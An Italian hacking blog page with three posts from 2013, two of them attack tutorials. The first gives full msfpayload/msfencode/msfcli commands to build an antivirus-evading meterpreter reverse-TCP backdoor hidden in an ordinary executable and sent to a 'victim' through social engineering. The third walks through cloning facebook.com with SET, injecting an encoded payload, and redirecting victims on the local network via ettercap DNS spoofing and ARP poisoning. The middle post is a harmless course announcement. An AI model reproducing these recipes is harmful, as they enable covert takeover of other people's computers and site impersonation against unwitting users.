domenica 17 marzo 2013

Creazione di un Backdoor con i PayLoads di Metasploit

Quasi tutti i Pentesters e gli appassionati di informatica non specializzati, conosceranno il famigerato framework "Metasploit". Chi non lo conosce si informi, perché ha un bel mondo da scoprire avanti a se.
Chi ha mai tentato di effettuare un pentesting su un sistema (anche quello di casa sua), conoscerà il grande "msfpayload" che in pratica è il tool che permette al pentester di avere il controllo del pc exploitato. Però, molti non sanno che i payload generati possono anche essere racchiusi in un eseguibile da mandare alla nostra vittima manualmente, quindi chi non riuscisse a trovare una vulnerabilità del sistema, può sempre affidarsi a questo metodo secondario che richiede semplicemente il buon vecchio social engineering.

Bando alle ciance e ciancio alle bande, quel che voglio mostrarvi oggi è proprio questo ed è ottenibile tramite una funzione già integrata nell'msfpayload, quindi per fare un articolo un po più ricco, vedremo come attaccare un sistema tramite questa tecnica, usando come payload il classico meterpreter in reverse_tcp criptato in modo da essere quasi FUD

Mettiamo mano a backtrack (usate quel che volete), e come prima con il comando "ifconfig" vediamo qual'è il local host.
Capito questo, nel mio caso 192.168.1.4, vediamo come creare un file con estensione .exe tramite metasploit, ma senza alcuna criptazione:
- msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.4 lport=4444 X > meterpreter.exe

Quel parametro "X > meterpreter.exe" è proprio quello che ci interessa per creare il file, che si chiamerà appunto "meterpreter.exe".

Adesso invece, cambieremo qualche cosetta in modo da rendere il nostro backdoor completamente non rilevabile dagli antivirus, con questo comando:

-msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.4 lport=4444 R | msfencode -t exe -c 2 -x /root/Desktop/file.exe > encoded.exe

Attenzione, analizziamo insieme il comando. L'opzione R serve a passare il comando all'msfencode, "-t" specifica l'estensione del file da criptare, "-c" imposta il numero di criptazioni e "-x /root/Desktop/file.exe" serve a implementare il payload nel file.
In questo modo avrete ottenuto un vero e proprio backdoor con connessione reverse tcp e con una grande possibiltà di bypassing degli antivirus.

Ovviamente, per poter far funzionare il nostro eseguibile avremo infine bisogno di un qualcosa che ci faccia da client per il ricevimento delle informazioni e questo è ottenibile, semplicemente digitando:

-msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost=192.168.1.4 lport=4444 E

Così facendo, appena il client troverà la connessione in entrata aprirà la sessione di meterpreter e sarete dentro.

A presto


Pubblicato da BlackHack a 20:33 0 commenti

sabato 23 febbraio 2013

eLearnSecurity Students pack v2 a breve rilasciato

Tutti gli appassionati di PenTesting conosceranno eLearnSecurity, la compagnia Italiana che ha inizializzato al PT migliaia di persone con guide studiate nel dettaglio per fornire ai beginners appassionati, tutti li strumenti per fare pratica, con la teoria sotto mano...
Per chi non lo conoscesse, consiglio vivamente di visitare il sito e dare un'occhiata alle svariate possibilità di apprendimento fornite.
Bando alle ciance, martedì 19 febbraio, durante un loro webinar, al quale ho volentieri assistito, hanno annunciato il lancio dello  Penetration Testing student v.2, cioè un pacchetto attualissimo, trattante tutte le svariate sfaccettature del pentesting; dalla sicurezza sul web (sniffing e i vari attacchi) alla sicurezza delle applicazione web (trattando xss, sql injection e quant'altro...), senza dimenticarsi ovviamente della sicurezza dei programmi e del sistema (con una breve introduzione all'asm al c++ e al C, e lo studio di attacchi come il buffer overflow, stack overflow...).

Io lo consiglio veramente a tutti quelli che hanno tempo e passione per addentrarsi nell'argomento, poiché tratta veramente in modo ben fatto tutti gli argomenti che, se studiati sul web, richiedono il triplo del tempo di studio.
Per tutte le informazioni, visitate il sito ELearnSecurity e ordinate il vostro pacchetto.
La data di uscita ufficiale è il 26 febbraio.
Buono studio a tutti.
Pubblicato da BlackHack a 11:27 0 commenti

lunedì 11 febbraio 2013

Payload Injection tramite Site cloning e Dns Spoofing con BT5

Oggi ragazzi, farò un breve guida sul come injectare un payload in un computer connesso sulla nostra stessa rete, usando il "Site cloning" e il "Dns spoofing" con Backtrack 5.
Quel che andremo a fare sarà configurare un exploit in modo che quando la vittima si connetterà ad un determinato sito scelto da noi, tramite il dns spoofing sarà redirectata al nostro local host, nel quale sarà preparato esattamente il sito che si aspetta, con la sola differenza, che nel sito sarà injectato il nostro payload, compresso e criptato per essere invisibile agli antivirus, che ci permetterà di avere il controllo del pc vittima, senza che questa si accorda di nulla.

Quel che ci serve, è tutto già compreso in BT 5 ed è il Social Engineering Toolkit, Metasploit ed Ettercap.
Apriamo SET e:

  • Spostiamoci in Social Engineering Attacks (1)->WebSite Attacks Vector(2)->Java Applet Attack Vector(1)->Site Cloner(2).
  • Scriviamo adesso il nostro LHost, il mio è 192.168.1.5.
  • Inseriamo l'indirizzo del sito da clonare, io metto "www.facebook.com".
  • Impostato la porta di ricezione (default:443)
  • Impostiamo il payload, di solito io uso meterpreter in reverse_tcp
  • Impostiamo il metodo di criptazione (usa l'msfencoder), nel multi encoding (15) [il 16 è anche meglio]
  • Adesso SET vi chiederà se inizializzare il listening sulla porta da voi scelta, tramite l'msfcli, dategli "yes"


Ora che abbiamo creato il sito con il payload sul nostro local host e abbiamo impostato l'ascolto sulla nostra porta, non bisognerà fare altro che redirectare la vittima con il dns spoofing al nostro lhost, tramite ettercap.
Quindi apriamo un terminale e digitiamo:

gedit /usr/local/share/ettercap/etter.dns

Ci si aprirà il file di configurazione dns di ettercap, nel quale dovremo impostare il sito origine e il sito destinazione, quindi spostiamoci in basso e scriviamo:

facebook.com A Lhost
*.facebook.com A Lhost 

Così adesso il plugin di dns spoofing di ettercap saprà cosa fare. Adesso possiamo procedere al redirecting tramite questo comando, che tramite un attacco MITM (se non sapete cos'è, l'ho trattato parecchio tempo fa QUA) farà ciò che noi vogliamo:

ettercap -Tqi wlan0 -P dns_spoof -M ARP // //

Farà tutto lui, lasciate fare e dimenticatevi di questo terminale. Tornate su SET e vedrete che appena la vittima aprirà il sito www.facebook.com, vi si aprirà la classica sessione di meterpreter, o la shell e quant'altro nel caso aveste scelto un altro payload.

Se vi è interessato l'articolo, continuate a seguirmi ogni settimana, perché penso che da qua in poi pubblicherò qualcosa in più sul pentesting.
Alla prossima
Pubblicato da BlackHack a 11:38 0 commenti
Etichette: ,
Iscriviti a: Post (Atom)
Related Posts Plugin for WordPress, Blogger...